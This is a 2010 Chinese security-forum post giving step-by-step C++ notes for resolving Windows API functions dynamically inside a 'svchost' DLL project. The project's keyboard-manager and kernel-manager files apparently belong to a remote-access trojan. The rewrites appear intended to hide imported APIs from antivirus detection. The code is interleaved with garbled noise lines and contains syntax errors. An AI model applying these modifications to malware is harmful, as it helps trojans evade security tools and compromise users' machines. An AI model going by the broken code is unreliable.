标题:
[原创文章]
全局动态调用
[打印本页]
作者:
ice_xke
时间:
2010-10-19 12:30
标题:
全局动态调用
全局动态调用笔记
8 u Y/ {+ a x8 }+ i
svchost files工程->插入->类(Generic Class DTDY)->DTDY.cpp DTDY.h
, \, D' ^2 a" Y' v4 M0 M
----------------------------------------
; \" R0 \5 i; L/ b/ Q
DTDY.h:
7 U( {2 B5 a8 b; J1 N" O% z
" V2 ~% G! f7 S+ B+ g
#if _MSC_VER>1000
% y* F E* x5 j* `4 g0 O- J+ J
#pragma once
& i0 G& m" [ N6 r: T0 a
#endif //_MSC_VER>1000
% w' k, {) a+ n' C1 Q& k
#include<windows.h>
# y, G8 j7 a$ {1 D5 f3 N! P9 _
) j$ @5 P0 f$ a8 s4 h3 N( n
typedef DWORD (__stdcall *pGetModuleFileNameA)(HMODULE,LPSTR,DWORD);
( D6 P' t( f, h" l
class DTDY
% b' v: n6 H+ o1 G+ k& w7 l) r
{
9 o+ K( c) q9 D4 B( b
public:
' |- X1 r# A1 r3 v4 H3 s
DTDY();
5 q8 t O) R2 k" D
virtual ~DTDY();
& _# m; c" A1 V* }4 f( v0 Z
public:
2 X# G8 n }, l8 D3 _
static pGetModuleFileNameA MyGetModuleFileName;
: h* ^' F! x; C, y% a8 X- S' M
static BOOL FunInitiallization();
$ e5 I5 _- V/ a/ K
};
3 D( v7 X4 p! \" r
#endif
$ I3 {6 @1 g. @ b; `
----------------------------------------
J3 y# H: R$ a8 g6 c) Z3 n) l% i
) _$ M' k5 o! a# ^9 s- j$ ^
DTDY.cpp:
$ }- k/ P8 ], @% L( j7 ]+ a
* i' i. }5 _) U9 T
#include "DTDY.h"
7 m; S4 U7 t4 d; d1 N
pGetModuleFileNameA DTDY::MyGetModuleFileName=NULL;
2 b4 m" t8 A5 N$ {" w
DTDY:TDY()
2 `! B" K7 O4 q& |0 J3 F' Z
{
" h& H! Z k3 I) Z' r. s9 ]& y
}
* s+ u" J* b- T# o1 f
DTDY::~DTDY()
+ i2 ?( G$ P# x: E0 K
{
! P- v2 Y, \) u4 x5 R# f
}
. l" y1 f& r5 W' }5 R9 \( \
BOOL DTDY::FunInitiallization()
: D4 H% N) M2 \$ j1 A. p7 I! B3 x5 Q
{
. t! a+ T$ q1 e# a
HMODULE hModule=LoadLibrary("kernel32.dll");
8 o3 x8 r% y9 P( f, }2 e
MyGetModuleFileName=(pGetModuleFileNameA)GetProcAddress(hModule,"GetModuleFileNameA");
p3 h+ q" L$ Y% c8 r
if(!MyGetModuleFileName=) return FALSE;
v" y( y0 U/ c
$ @# M+ F- C7 S+ x( {% ]" L
return TRUE;
" p" `& x' g; i" }" x6 G8 J
}
# o3 M, f, j2 K- S
----------------------------------------
8 b3 a. C/ r0 M6 N0 l
svchost.cpp:
9 ^) g* A* m0 M
1 k9 m1 x8 b# c; s2 K; H$ ?; t
#include "DTDY.h"
9 s3 |: l8 i5 b) U* C
' s: F2 G- d) C1 |7 @
BOOL APIENTRY DllMain(HANDLE hModule,DWORD ul_reason_for_call,LPVOID lpReserved)
; x# p+ k, Q5 \* Z
{
) v3 e e8 M e- x) w
switch(ul_reason_for_call)
; Y+ z' A3 Z2 _4 U8 R
{
: O3 t$ [- _& k; o" m' {/ _( S
case DLL_PROCESS_ATTACH:
4 q2 D4 {; b7 S" i2 q
if(!DTDY::FunInitiallization()) return FALSE;
3 n! S* F8 U/ {& K7 C
h" M: D6 k: q1 ?
break;
: u0 F3 Y' T0 f1 z
}
0 y+ ?5 Y: f8 i0 U* g, J
}
/ H u c# A2 ~
2 Y. V0 Q `. p$ q7 Y7 `
4 v$ P5 ]. I; B x
GetModuleFileName(CKeyboardManager::g_hInstance,strFileName,sizeof(strFileName));->goto def
0 n, ~' \( E% c0 F4 K
改写为
& Z+ T3 X5 E" Q4 {+ k" i, S
DTDY::MyGetModuleFileName(CKeyboardManager::g_hInstance,strFileName,sizeof(strFileName));
9 ?/ C2 f+ a- y
----------------------------------------
/ k1 |$ S* u( Y) b4 `, k
KernelManager.cpp:
F( ~3 X0 l3 d+ m! M# Y
1 Z: Y( Y/ | x; t% G8 q
#include "../DTDY.h"
+ H# e3 A- t1 H x" z
GetModuleFileName(CKeyboardManager::g_hInstance,strServiceDll,sizeof(strServiceDll));
1 g; K5 x0 o8 ^$ B- W9 z( D5 {
改写为
' r. u3 |0 k/ n% g5 F
DTDY::MyGetModuleFileName(CKeyboardManager::g_hInstance,strServiceDll,sizeof(strServiceDll));
1 {4 K- O1 l3 e+ Q
----------------------------------------
欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com./)
Powered by Discuz! 7.2
